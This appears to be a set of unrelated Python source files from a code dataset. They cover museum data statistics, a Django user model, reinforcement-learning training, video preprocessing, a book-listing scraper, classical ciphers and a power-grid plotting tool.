inplace=True)\r\nsub.drop(columns=['Artist Begin Date', 'Artist End Date'], inplace=True)\r\ndef mydist(x, y):\r\n sc1=0\r\n sc2=0\r\n sc3=0\r\n sc4=0\r\n sc5=0\r\n sc6=0\r\n sc7=0\r\n sc8=0\r\n sc9=0\r\n sc10=0\r\n sc11=0\r\n sc12=0\r\n if x[0] != y[0]:\r\n sc1 = 1\r\n if x[1] != y[1]:\r\n sc2 = 1\r\n sc3=abs(x[2]-y[2])/max_begin\r\n sc4=abs(x[3]-y[3])/max_end\r\n sc5 = abs(x[4]-y[4])/max_dim\r\n sc6 = abs(x[5]-y[5])/max_len\r\n sc7 = abs(x[6]-y[6])/max_wid\r\n if x[7] != y[7]:\r\n sc8=1\r\n sc9=cat_dist(set(mydict_name.get(x[8])), set(mydict_name.get(y[8])), 'Object Name')\r\n sc10= cat_dist(set(mydict_medium.get(x[9])), set(mydict_medium.get(y[9])), 'Medium')\r\n sc11 = cat_dist(set(mydict_cl.get(x[10])), set(mydict_cl.get(x[10])), 'Credit Line')\r\n sc12 = cat_dist(set(mydict_class.get(x[11])), set(mydict_class.get(y[11])), 'Classification')\r\n return sc1+sc2+sc3+sc4+sc5+sc6+sc7+sc8+sc9+sc10+sc11+sc12\r\ndef mydist2(x, y):\r\n sc1=0\r\n sc2=0\r\n sc3=0\r\n sc4=0\r\n sc5=0\r\n sc6=0\r\n sc7=0\r\n sc8=0\r\n sc9=0\r\n sc10=0\r\n sc11=0\r\n sc12=0\r\n if x[0] != y[0]:\r\n sc1 = 1\r\n if x[1] != y[1]:\r\n sc2 = 1\r\n sc3=abs(x[2]-y[2])/max_begin2\r\n sc4=abs(x[3]-y[3])/max_end2\r\n sc5 = abs(x[4]-y[4])/max_dim2\r\n sc6 = abs(x[5]-y[5])/max_len2\r\n sc7 = abs(x[6]-y[6])/max_wid2\r\n if x[7] != y[7]:\r\n sc8=1\r\n sc9=cat_dist(set(mydict_name2.get(x[8])), set(mydict_name2.get(y[8])), 'Object Name')\r\n sc10= cat_dist(set(mydict_medium2.get(x[9])), set(mydict_medium2.get(y[9])), 'Medium')\r\n sc11 = cat_dist(set(mydict_cl2.get(x[10])), set(mydict_cl2.get(x[10])), 'Credit Line')\r\n sc12 = cat_dist(set(mydict_class2.get(x[11])), set(mydict_class2.get(y[11])), 'Classification')\r\n return sc1+sc2+sc3+sc4+sc5+sc6+sc7+sc8+sc9+sc10+sc11+sc12\r\nl1=[21,8,12,15,9,11,20]\r\nl2=[9,22,11,16,6,6,9,5,17,10,8,16,7]\r\nsp.stats.ranksums(l1,l2)\r\nRanksumsResult(statistic=1.2282647202130073, pvalue=0.21934761016862558)\r\nsp.stats.ranksums(np.array(df['Dimensions']), np.array(df2['Dimensions']))\r\nRanksumsResult(statistic=5.524310971077592, pvalue=3.307811462120068e-08)\r\nnp.median(np.array(df['Dimensions']))\r\n691.67\r\nnp.median(np.array(df2['Dimensions']))\r\n170.81\r\nnp.mean(np.array(df['Dimensions']))\r\n1159.1737500000002\r\nnp.mean(np.array(df2['Dimensions']))\r\n1237.455437323944\r\nn, bins, patches = plt.hist(df['Dimensions'], 100, facecolor='blue')\r\nplt.show()\r\nn, bins, patches = plt.hist(df2['Dimensions'], 100, facecolor='blue')\r\nplt.show()\r\nTest Is Public Domain\r\ncount = np.array([79, 108])\r\nnobs = np.array([96, 142])\r\nstat, pval = proportions_ztest(count, nobs)\r\npval\r\n0.2501178231151471\r\nsp.stats.ranksums(np.array(df['Object Begin Date']), np.array(df2['Object Begin Date']))\r\nRanksumsResult(statistic=5.7123889544597715, pvalue=1.1140110866430812e-08)\r\nsp.stats.ranksums(np.array(df['Object End Date']), np.array(df2['Object End Date']))\r\nRanksumsResult(statistic=4.681798372049257, pvalue=2.843691115489764e-06)\r\nn, bins, patches = plt.hist(df['Object Begin Date'], 100, facecolor='blue')\r\nplt.show()\r\nn, bins, patches = plt.hist(df2['Object Begin Date'], 100, facecolor='blue')\r\nplt.show()\r\nn, bins, patches = plt.hist(df['Object End Date'], 100, facecolor='blue')\r\nplt.show()\r\nn, bins, patches = plt.hist(df['Object End Date'], 100, facecolor='blue')\r\nplt.show()\r\nn, bins, patches = plt.hist(df2['Object End Date'], 100, facecolor='blue')\r\nplt.show()\r\nsp.stats.ranksums(np.array(df['Length']), np.array(df2['Length']))\r\nRanksumsResult(statistic=5.182699940036491, pvalue=2.1869672333507455e-07)\r\nsp.stats.ranksums(np.array(df['Width']), np.array(df2['Width']))\r\nRanksumsResult(statistic=4.8871488232930655, pvalue=1.0230675898872156e-06)\r\n'''","sub_path":"met dataset.py","file_name":"met dataset.py","file_ext":"py","file_size_in_byte":30448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"53184988","text":"''' database schema for user data '''\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.dispatch import receiver\n\nfrom fedireads import activitypub\nfrom fedireads.models.shelf import Shelf\nfrom fedireads.settings import DOMAIN\nfrom fedireads.signatures import create_key_pair\nfrom .base_model import FedireadsModel\n\n\nclass User(AbstractUser):\n ''' a user who wants to read books '''\n private_key = models.TextField(blank=True, null=True)\n public_key = models.TextField(blank=True, null=True)\n inbox = models.CharField(max_length=255, unique=True)\n shared_inbox = models.CharField(max_length=255, blank=True, null=True)\n federated_server = models.ForeignKey(\n 'FederatedServer',\n on_delete=models.PROTECT,\n null=True,\n )\n outbox = models.CharField(max_length=255, unique=True)\n summary = models.TextField(blank=True, null=True)\n local = models.BooleanField(default=True)\n fedireads_user = models.BooleanField(default=True)\n localname = models.CharField(\n max_length=255,\n null=True,\n unique=True\n )\n # name is your display name, which you can change at will\n name = models.CharField(max_length=100, blank=True, null=True)\n avatar = models.ImageField(upload_to='avatars/', blank=True, null=True)\n following = models.ManyToManyField(\n 'self',\n symmetrical=False,\n through='UserFollows',\n through_fields=('user_subject', 'user_object'),\n related_name='followers'\n )\n follow_requests = models.ManyToManyField(\n 'self',\n symmetrical=False,\n through='UserFollowRequest',\n through_fields=('user_subject', 'user_object'),\n related_name='follower_requests'\n )\n blocks = models.ManyToManyField(\n 'self',\n symmetrical=False,\n through='UserBlocks',\n through_fields=('user_subject', 'user_object'),\n related_name='blocked_by'\n )\n favorites = models.ManyToManyField(\n 'Status',\n symmetrical=False,\n through='Favorite',\n through_fields=('user', 'status'),\n related_name='favorite_statuses'\n )\n remote_id = models.CharField(max_length=255, null=True, unique=True)\n created_date = models.DateTimeField(auto_now_add=True)\n updated_date = models.DateTimeField(auto_now=True)\n manually_approves_followers = models.BooleanField(default=False)\n\n @property\n def activitypub_serialize(self):\n return activitypub.get_actor(self)\n\n\nclass UserRelationship(FedireadsModel):\n ''' many-to-many through table for followers '''\n user_subject = models.ForeignKey(\n 'User',\n on_delete=models.PROTECT,\n related_name='%(class)s_user_subject'\n )\n user_object = models.ForeignKey(\n 'User',\n on_delete=models.PROTECT,\n related_name='%(class)s_user_object'\n )\n # follow or follow_request for pending TODO: blocking?\n relationship_id = models.CharField(max_length=100)\n\n class Meta:\n abstract = True\n constraints = [\n models.UniqueConstraint(\n fields=['user_subject', 'user_object'],\n name='%(class)s_unique'\n ),\n models.CheckConstraint(\n check=~models.Q(user_subject=models.F('user_object')),\n name='%(class)s_no_self'\n )\n ]\n\n def get_remote_id(self):\n ''' use shelf identifier in remote_id '''\n base_path = self.user_subject.remote_id\n return '%s#%s/%d' % (base_path, self.status, self.id)\n\n\nclass UserFollows(UserRelationship):\n @property\n def status(self):\n return 'follows'\n\n @classmethod\n def from_request(cls, follow_request):\n return cls(\n user_subject=follow_request.user_subject,\n user_object=follow_request.user_object,\n relationship_id=follow_request.relationship_id,\n )\n\n\nclass UserFollowRequest(UserRelationship):\n @property\n def status(self):\n return 'follow_request'\n\n\nclass UserBlocks(UserRelationship):\n @property\n def status(self):\n return 'blocks'\n\n\nclass FederatedServer(FedireadsModel):\n ''' store which server's we federate with '''\n server_name = models.CharField(max_length=255, unique=True)\n # federated, blocked, whatever else\n status = models.CharField(max_length=255, default='federated')\n # is it mastodon, fedireads, etc\n application_type = models.CharField(max_length=255, null=True)\n application_version = models.CharField(max_length=255, null=True)\n\n\n@receiver(models.signals.pre_save, sender=User)\ndef execute_before_save(sender, instance, *args, **kwargs):\n ''' populate fields for new local users '''\n # this user already exists, no need to poplate fields\n if instance.id or not instance.local:\n return\n\n # populate fields for local users\n instance.remote_id = 'https://%s/user/%s' % (DOMAIN, instance.username)\n instance.localname = instance.username\n instance.username = '%s@%s' % (instance.username, DOMAIN)\n instance.actor = instance.remote_id\n instance.inbox = '%s/inbox' % instance.remote_id\n instance.shared_inbox = 'https://%s/inbox' % DOMAIN\n instance.outbox = '%s/outbox' % instance.remote_id\n if not instance.private_key:\n instance.private_key, instance.public_key = create_key_pair()\n\n\n@receiver(models.signals.post_save, sender=User)\ndef execute_after_save(sender, instance, created, *args, **kwargs):\n ''' create shelves for new users '''\n if not instance.local or not created:\n return\n\n shelves = [{\n 'name': 'To Read',\n 'identifier': 'to-read',\n }, {\n 'name': 'Currently Reading',\n 'identifier': 'reading',\n }, {\n 'name': 'Read',\n 'identifier': 'read',\n }]\n\n for shelf in shelves:\n Shelf(\n name=shelf['name'],\n identifier=shelf['identifier'],\n user=instance,\n editable=False\n ).save()\n","sub_path":"fedireads/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":6024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"243581226","text":"from django.urls import path\n\nfrom caseworker.advice import views\n\nurlpatterns = [\n path(\"\", views.AdvicePlaceholderView.as_view(), name=\"advice_placeholder\"),\n path(\"case-details/\", views.CaseDetailView.as_view(), name=\"case_details\"),\n path(\"select-advice/\", views.SelectAdviceView.as_view(), name=\"select_advice\"),\n path(\"approve-all/\", views.GiveApprovalAdviceView.as_view(), name=\"approve_all\"),\n path(\"refuse-all/\", views.RefusalAdviceView.as_view(), name=\"refuse_all\"),\n]\n","sub_path":"caseworker/advice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"247064734","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 18 12:40:41 2020\n\"\"\"\n\n# Module imports\nimport tensorflow as tf\nfrom tf_agents.environments import tf_py_environment\nfrom tf_agents.policies.random_tf_policy import RandomTFPolicy\nfrom tf_agents.replay_buffers.tf_uniform_replay_buffer import TFUniformReplayBuffer\nfrom tf_agents.trajectories import trajectory\nfrom tf_agents.policies.policy_saver import PolicySaver\n\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport numpy as np\n\n# Written by us imports\nfrom SquigglesEnvironment import SquigglesEnvironment\nfrom experience_replay import ExperienceReplay\nfrom basic_agent import generic_dqn_agent # a function\n\n# Globals\nNUMBER_ITERATION = 20000\nCOLLECTION_STEPS = 1\nBATCH_SIZE = 64\nEVAL_EPISODES = 10\nEVAL_INTERVAL = 1000\n\ndef get_average_return(environment, policy, episodes=10):\n\n total_return = 0.0\n\n for _ in range(episodes):\n time_step = environment.reset()\n episode_return = 0.0\n\n while not time_step.is_last():\n action_step = policy.action(time_step)\n time_step = environment.step(action_step.action)\n episode_return += time_step.reward\n\n total_return += episode_return\n avg_return = total_return / episodes\n\n return avg_return.numpy()[0]\n\ndef init():\n train_env = SquigglesEnvironment()\n evaluation_env = SquigglesEnvironment()\n\n train_env = tf_py_environment.TFPyEnvironment(train_env)\n evaluation_env = tf_py_environment.TFPyEnvironment(evaluation_env)\n\n agent, _ = generic_dqn_agent(train_env)\n\n experience_replay = ExperienceReplay(agent, train_env, BATCH_SIZE)\n\n return agent, train_env, evaluation_env, experience_replay\n\ndef training_loop(agent, train_env, evaluation_env, experience_replay):\n agent.train_step_counter.assign(0)\n\n avg_return = get_average_return(evaluation_env, agent.policy, EVAL_EPISODES)\n returns = [avg_return]\n\n for _ in tqdm(range(NUMBER_ITERATION)):\n\n for _ in range(COLLECTION_STEPS):\n experience_replay.timestamp_data(train_env, agent.collect_policy)\n\n experience, info = next(experience_replay.iterator)\n train_loss = agent.train(experience).loss\n\n if agent.train_step_counter.numpy() % EVAL_INTERVAL == 0:\n avg_return = get_average_return(evaluation_env, agent.policy, EVAL_EPISODES)\n print('Iteration {0} – Average Return = {1}, Loss = {2}.'.format(agent.train_step_counter.numpy(), avg_return, train_loss))\n returns.append(avg_return)\n\n #show_current(1000, evaluation_env, agent.policy)\n\n return returns\n\ndef show_current(ITER, env, policy):\n N = env.observation_spec().shape[0]\n state = env.reset()\n\n the_hits = np.zeros(ITER)\n agent_hits = []\n rewards = []\n for j in range(ITER):\n a = policy.action(state)\n agent_hits.append(a.action)\n\n state = env.step(a)\n rewards.append(state.reward)\n\n play = False\n if np.any(state.observation[0][0] == 0):\n play = True\n the_hits[j] = int(play)\n\n plt.figure()\n plt.plot(the_hits)\n plt.plot(agent_hits)\n plt.title(\"Action and space\")\n\n plt.figure()\n plt.plot(rewards)\n plt.title(\"Rewards\")\n plt.show()\n\ndef main():\n agent, train_env, evaluation_env, experience_replay = init()\n\n returns = training_loop(\n agent,\n train_env,\n evaluation_env,\n experience_replay\n )\n\n # save policy\n PolicySaver(agent.policy).save('policy_saved')\n\n plt.plot(returns)\n plt.title(\"Rewards overall\")\n plt.show()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"versions/mirror_no_silence_punish/cart_pole.py","file_name":"cart_pole.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"470246091","text":"import utils\nimport sys\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"phone_table_path\", type=str)\nparser.add_argument(\"pdf_table_path\", type=str)\nparser.add_argument(\"--typ\", type=str, default = 'mono', choices=['mono','biphone'])\n\nargs = parser.parse_args()\n\n\nphones = utils.read_phone_txt(args.phone_table_path,0)\nvalid_phone = []\nfor x in phones:\n for s in ['<','#']:\n if x.startswith(s):\n break\n else:\n valid_phone.append(x)\nif args.typ == 'mono':\n utils.write_phone_file(valid_phone, args.pdf_table_path, True)\nelse:\n L = []\n for i in range(len(valid_phone)):\n for j in range(len(valid_phone)+1):\n if j == 0:\n L.append('start' + '_' + valid_phone[i])\n else:\n L.append(valid_phone[j-1] + '_' + valid_phone[i])\n utils.write_phone_file(L, args.pdf_table_path, True)\n\n\n","sub_path":"src/WFST-decoder/scripts/phones2pdf.py","file_name":"phones2pdf.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"484866651","text":"'''\nCode for processing BDD100K dataset - small train subset 40K (Yu et al. 2020, https://bdd-data.berkeley.edu/)\nBased on code related to PredNet - Lotter et al. 2016 (https://arxiv.org/abs/1605.08104 https://github.com/coxlab/prednet).\nMethod of resizing was specified (bicubic). \n'''\n\nimport os, pdb\nimport imageio, random\nimport hickle as hkl\nimport h5py\nimport numpy as np\nfrom scipy.misc import imresize\nfrom scipy.misc import toimage\nfrom kitti_settings import *\n\n\ndesired_sz = (128, 160)\n# change 30fps to 10 fps\noffset = 0\nshift = 3\nsources_name = \"sources_bdd100k_train_40K.hkl\"\n#use the same sequences as were used during training\nsources = hkl.load(DATA_DIR+sources_name)\n\nsel_sequences = []\nfor seq in sources:\n if seq not in sel_sequences:\n sel_sequences.append(seq)\n\n\nX=[]\nfor sequence in sel_sequences:\n vid = imageio.get_reader(DATA_DIR+\"raw_bdd100k_dataset/bdd100k/videos/\"+\"train/\"+sequence, 'ffmpeg', fps=30)\n \n for i, im in enumerate(vid):\n # change 30fps to 10 fps\n if (i-offset) % shift == 0:\n target_ds = float(desired_sz[0]) / im.shape[0]\n im = imresize(im, (desired_sz[0], int(np.round(target_ds * im.shape[1]))), 'bicubic')\n d = int((im.shape[1] - desired_sz[1]) / 2)\n im = im[:, d:d + desired_sz[1]]\n X.append(im)\n\nX = np.array(X)\n\n\nhkl.dump(X, os.path.join(DATA_DIR, 'X_bdd100k_train_40K' + '.hkl'))\n\n\n\n\n","sub_path":"process_selected_bdd100k_train_40K.py","file_name":"process_selected_bdd100k_train_40K.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"434787220","text":"'''\n抓取豆瓣图书 Top250\n字段:书名\n 评分\n 作者\n库: 内置库 urllib\n 第三方库 lxml\n面向函数编程\n'''\nfrom urllib import request\nimport urllib\nfrom lxml import etree\nimport time\n# 文件IO对象\nwith open('douban.txt','a',encoding='utf-8') as fp:\n # 获取源码方法\n def MakePage():\n i = 0\n while i <= 225:\n base_url = \"https://book.douban.com/top250?start={0}\".format(i)\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\n req = urllib.request.Request(url=base_url, headers=headers)\n re = urllib.request.urlopen(req).read()\n print(re)\n time.sleep(2)\n i += 25\n html = re.decode('utf-8') # 获取源码并解码\n htmls = etree.HTML(html) # 处理源码\n StoInfo(htmls) # 调清洗���据方法并传值\n\n # 清洗数据并保存\n def StoInfo(htmls):\n book_name = htmls.xpath('//div[@class=\"pl2\"]/a/@title') # 书名\n ratings = htmls.xpath('//span[@class=\"rating_nums\"]/text()') # 评分\n writers = htmls.xpath('//p[@class=\"pl\"]/text()') # 作者\n lens = len(book_name) #获取一个字段的长度\n i = 0\n while i < lens:\n print('loading......')\n book_names = book_name[i] # 遍历书名\n rating = ratings[i] # 遍历评分\n writer = writers[i].split('/')[0] # 遍历作者\n fp.write('《'+book_names+'》' + ' 评分:'+rating+' 作者:'+writer + '\\n' )\n i += 1\n\n if __name__ == '__main__':\n MakePage()\n\n\n\n","sub_path":"douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"530753096","text":"\"\"\"\r\nAuthor: Nguyễn mạnh trung\r\nDate: 19/09/2021\r\nProblem: Assume that the variable teststring refers to a string. Write a loop that prints\r\neach character in this string, followed by its ASCII value.\r\nSolution:\r\n\"\"\"\r\nstr = input(\"Nhập String : \")\r\nfor i in range(len(str)):\r\n print(\"giá trị ascii của ký tự %c = %d\" % (str[i], ord(str[i])))","sub_path":"nguyenmanhtrung_44617_ca18a1a-cp3/nguyenmanhtrung_44617_ca18a1a/excercise/page_70_exercise_05.py","file_name":"page_70_exercise_05.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"309147573","text":"##### CREATIVE COMMONS LICENSE BLOCK #####\n# This program is licensed under a Creative Commons Attribution 4.0\n# International License (CC BY 4.0). You are free to share (copy and\n# redistribute the material in any medium or format) and adapt (remix,\n# transform, and build upon the material) for any purpose, even\n# commercially, as long as you give appropriate credit, provide a link\n# to the license, and indicate if changes were made. You may do so in\n# any reasonable manner, but not in any way that suggests the licensor\n# endorses you or your use.\n\nfrom cipher import settings\n\ndef _atbash(alphabet, char):\n return alphabet[len(alphabet)-1-alphabet.index(char)]\n\t\ndef _caesar(alphabet, char, shift):\n return alphabet[(alphabet.index(char)+shift) % len(alphabet)]\n\t\ndef atbash(text):\n output = ''\n \n for char in text:\n if char in settings.LOWERCASE:\n output += _atbash(settings.LOWERCASE, char)\n elif char in settings.UPPERCASE:\n output += _atbash(settings.UPPERCASE, char)\n else:\n output += char\n \n return output\n\t\ndef caesar(text, shift=3):\n output = ''\n \n for char in text:\n if char in settings.LOWERCASE:\n output += _caesar(settings.LOWERCASE, char, shift)\n elif char in settings.UPPERCASE:\n output += _caesar(settings.UPPERCASE, char, shift)\n else:\n output += char\n \n return output\n\t\ndef rot13(text):\n return caesar(text, 13)\n\n# NOTE: Currently converts all plaintext to lowercase (so, no uppercase\n# letters for now). Will fix in the future.\ndef keyword(key, text):\n # Construct new cipher alphabets\n alphabet = key.lower()\n \n i = settings.LOWERCASE.index(alphabet[len(alphabet) - 1])\n for x in range(len(settings.LOWERCASE)):\n i = (i + 1) % len(settings.LOWERCASE)\n if settings.LOWERCASE[i] not in alphabet:\n alphabet += settings.LOWERCASE[i]\n \n # Return substitution with no shift\n output = ''\n for char in text:\n if char.lower() in alphabet:\n output += alphabet[settings.LOWERCASE.index(char.lower()) % len(settings.LOWERCASE)]\n else:\n output += char\n \n return output\n","sub_path":"cipher/substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"379169944","text":"import json \nimport os \nimport sys, getopt\nfrom datetime import datetime\nimport importlib, copy\nfrom importlib import util\n\ndef help():\n\tprint('Syntax:')\n\tprint('json2png.py -i|--ifile [-o|--ofile ] [-t|--type [ ...]')\n\tprint(' -i|--ifile : [REQUIRED] json input file name.')\n\tprint(' -o|--ofile : [OPTIONAL] png output file name.')\n\tprint(' -t|--type : [OPTIONAL] specify output type')\n\tprint('Output types')\n\tprint(' summary : [DEFAULT] output a summary of model')\n\tprint(' -s|--size x : [OPTIONAL] image size in pixels')\n\tprint(' profile : output the voltage profile')\n\tprint(' -d|--dpi : [OPTIONAL] image resolution in dots per inch')\n\tprint(' -l|--limit : [OPTIONAL] voltage range limit in percent')\n\tprint(' --with-nodes : [OPTIONAL] label branching nodes')\n\nfilename_json = ''\nfilename_png = ''\nbasename = ''\noutput_type = 'summary'\nwith_nodes = False\nresolution = \"300\"\nsize = \"300x200\"\nlimit = None\nxlim = None\n\ntry : \n\topts, args = getopt.getopt(sys.argv[1:],\"hi:o:t:d:l:s:x:\",[\"help\",\"ifile=\",\"ofile=\",\"type=\",\"with-nodes\",\"dpi=\",\"limit=\",\"size=\",\"xlim\"])\nexcept getopt.GetoptError:\n\tsys.exit(2)\nif not opts : \n\thelp()\n\tsys.exit(1)\nfor opt, arg in opts:\n\tif opt in (\"-h\",\"--help\"):\n\t\thelp()\n\t\tsys.exit(0)\n\telif opt in (\"-i\", \"--ifile\"):\n\t\tfilename_json = arg\n\t\tif filename_png == '':\n\t\t\tif filename_json[-5:] == \".json\":\n\t\t\t\tbasename = filename_json[:-5]\n\t\t\telse: \n\t\t\t\tbasename = filename_json\n\t\t\tfilename_png = basename + \".png\"\n\telif opt in (\"-o\", \"--ofile\"):\n\t\tfilename_png = arg\n\telif opt in (\"-t\",\"--type\"):\n\t\toutput_type = arg\n\telif opt == '--with-nodes':\n\t\twith_nodes = True\n\telif opt in (\"-d\",\"--dpi\"):\n\t\tresolution = arg\n\telif opt in (\"-s\",\"--size\"):\n\t\tsize = arg\n\telif opt in (\"-l\",\"--limit\"):\n\t\tlimit = int(arg)/100\n\telif opt in (\"-x\",\"--xlim\"):\n\t\txlim = arg.split(',')\n\telse:\n\t\traise Exception(\"'%s' is an invalid command line option\" % opt)\n\nwith open(filename_json,\"r\") as f :\n\tdata = json.load(f)\n\tassert(data['application']=='gridlabd')\n\tassert(data['version'] >= '4.2.0')\n\nif output_type == 'csvplot':\n\n\timport pandas as pd\n\timport matplotlib.pyplot as plt\n\tcsv = pd.read_csv(filename_png.replace('.png','.csv'),index_col='timestamp')\n\tax = csv.plot(figsize=(7,7))\n\tax.set_xticklabels(ax.get_xticklabels(),rotation='vertical')\n\tax.grid()\n\tax.legend()\n\tax.set_title(filename_png)\n\tplt.margins(0.2)\n\tplt.subplots_adjust(bottom=0.3)\n\tplt.savefig(filename_png)\n\n\n#\n# -t summary\n#\nelif output_type == 'summary':\n\n\tfilename = data[\"globals\"][\"modelname\"][\"value\"]\n\tfrom PIL import Image, ImageDraw, ImageFont\n\tsz = size.split(\"x\")\n\tsx = int(sz[0])\n\tsy = int(sz[1])\n\timg = Image.new(mode=\"RGB\",size=(sx,sy),color=\"white\")\n\tdraw = ImageDraw.Draw(img)\n\n\tdef node(draw,x,y,text,vmargin=1,hmargin=1,fnt=ImageFont.load_default()):\n\t\tsz = draw.multiline_textsize(text,font=fnt)\n\t\tdraw.rectangle([x-sz[0]/2-hmargin,y-sz[1]/2-vmargin,x+sz[0]/2+hmargin,y+sz[1]/2+vmargin],outline=\"black\",fill=\"white\")\n\t\tdraw.multiline_text((x-sz[0]/2,y-sz[1]/2),text,font=fnt,fill=\"black\")\n\n\timport hashlib\n\tmd5 = hashlib.md5()\n\twith open(filename,\"r\") as f:\n\t\tmd5.update(f.read().encode())\n\tnode(draw,x=sx/2,y=sy/2,text=\"\"\"Name..... %s\nDigest... %s\nDate..... %s\"\"\" % (filename,md5.hexdigest(),datetime.now().strftime(\"%y-%m-%d %H:%M:%S\")),vmargin=2,hmargin=3)\n\timg.save(filename_png)\n\n#\n# -t profile\n#\nelif output_type == 'profile':\n\n\timport matplotlib.pyplot as plt\n\tplt.figure(1);\n\n\tdef find(objects,property,value):\n\t\tresult = []\n\t\tfor name,values in objects.items():\n\t\t\tif property in values.keys() and values[property] == value:\n\t\t\t\tresult.append(name)\n\t\treturn result\n\n\tdef get_string(values,prop):\n\t\treturn values[prop]\n\n\tdef get_complex(values,prop):\n\t\treturn complex(get_string(values,prop).split(\" \")[0].replace('i','j'))\n\n\tdef get_real(values,prop):\n\t\treturn get_complex(values,prop).real\n\n\tdef get_voltages(values):\n\t\tph = get_string(values,\"phases\")\n\t\tvn = abs(get_complex(values,\"nominal_voltage\"))\n\t\tresult = []\n\t\ttry:\n\t\t\tva = abs(get_complex(values,\"voltage_A\"))/vn\n\t\texcept:\n\t\t\tva = None\n\t\ttry:\n\t\t\tvb = abs(get_complex(values,\"voltage_B\"))/vn\n\t\texcept:\n\t\t\tvb = None\n\t\ttry:\n\t\t\tvc = abs(get_complex(values,\"voltage_C\"))/vn\n\t\texcept:\n\t\t\tvc = None\n\t\treturn ph,vn,va,vb,vc\n\n\tdef profile(objects,root,pos=0):\n\t\tfromdata = objects[root]\n\t\tph0,vn0,va0,vb0,vc0 = get_voltages(fromdata)\n\n\t\tcount = 0\n\t\tfor link in find(objects,\"from\",root):\n\t\t\tlinkdata = objects[link]\n\t\t\tlinktype = \"-\"\n\t\t\tif \"length\" in linkdata.keys():\n\t\t\t\tlinklen = get_real(linkdata,\"length\")/5280\n\t\t\telse:\n\t\t\t\tlinklen = 0.0\n\t\t\tif not \"line\" in get_string(linkdata,\"class\"):\n\t\t\t\tlinktype = \"--o\"\n\t\t\tif \"to\" in linkdata.keys():\n\t\t\t\tto = linkdata[\"to\"]\n\t\t\t\ttodata = objects[to]\n\t\t\t\tph1,vn1,va1,vb1,vc1 = get_voltages(todata)\n\t\t\t\tprofile(objects,to,pos+linklen)\n\t\t\t\tcount += 1\n\t\t\t\tif \"A\" in ph0 and \"A\" in ph1: plt.plot([pos,pos+linklen],[va0,va1],\"%sk\"%linktype)\n\t\t\t\tif \"B\" in ph0 and \"B\" in ph1: plt.plot([pos,pos+linklen],[vb0,vb1],\"%sr\"%linktype)\n\t\t\t\tif \"C\" in ph0 and \"C\" in ph1: plt.plot([pos,pos+linklen],[vc0,vc1],\"%sb\"%linktype)\n\t\t\t\tif limit:\n\t\t\t\t\tif (not va1 is None and va1>1+limit) or (not vb1 is None and vb1>1+limit) or (not vc1 is None and vc1>1+limit) : \n\t\t\t\t\t\tprint(\"json2png.py WARNING: node %s voltage is high (%g, %g, %g), phases = '%s', nominal voltage=%g\" % (to,va1*vn1,vb1*vn1,vc1*vn1,ph1,vn1));\n\t\t\t\t\tif (not va1 is None and va1<1-limit) or (not vb1 is None and vb1<1-limit) or (not vc1 is None and vc1<1-limit) : \n\t\t\t\t\t\tprint(\"json2png.py WARNING: node %s voltage is low (%g, %g, %g), phases = '%s', nominal voltage=%g\" % (to,va1*vn1,vb1*vn1,vc1*vn1,ph1,vn1));\n\t\tif count > 1 and with_nodes:\n\t\t\tplt.plot([pos,pos,pos],[va0,vb0,vc0],':*',color='grey',linewidth=1)\n\t\t\tplt.text(pos,min([va0,vb0,vc0]),\"[%s] \"%root,color='grey',size=6,rotation=90,verticalalignment='top',horizontalalignment='center')\n\n\tfor obj in find(objects=data[\"objects\"],property=\"bustype\",value=\"SWING\"):\n\t\tprofile(objects=data[\"objects\"],root=obj)\n\tplt.xlabel('Distance (miles)')\n\tplt.ylabel('Voltage (pu)')\n\tplt.title(data[\"globals\"][\"modelname\"][\"value\"])\n\tplt.grid()\n\tplt.legend([\"A\",\"B\",\"C\"])\n\tplt.tight_layout()\n\tif limit:\n\t\tplt.ylim([1-limit,1+limit])\n\tif xlim:\n\t\tplt.xlim([float(xlim[0]),float(xlim[1])])\n\tplt.savefig(filename_png, dpi=int(resolution))\n\nelse:\n\tmodname = sys.argv[0].replace(\"json2png.py\",\"json2png-%s.py\"%output_type)\n\tif os.path.exists(modname):\n\n\t\timport importlib, copy\n\t\tmodspec = util.spec_from_file_location(output_type, modname)\n\t\tmod = importlib.import_module(\"json2png-%s\"%output_type)\n\t\targv = copy.deepcopy(sys.argv)\n\t\targv[0] = modname\n\t\tmod.main(argv)\n\n\telse:\n\n\t\traise Exception(\"type '%s' is not valid\" % output_type)\n\n### oneline method\n# from PIL import Image, ImageDraw, ImageFont\n# im = Image.new(mode=\"RGB\",size=(600,400),color=\"white\")\n# draw = ImageDraw.Draw(im)\n# fnt = ImageFont.load_default()\n\n# def node(x,y,label):\n# \tsz = draw.multiline_textsize(label,font=fnt)\n# \tdraw.rectangle([x-sz[0]/2-1,y-sz[1]/2-1,x+sz[0]/2+1,y+sz[1]/2+1],outline=\"black\",fill=\"white\")\n# 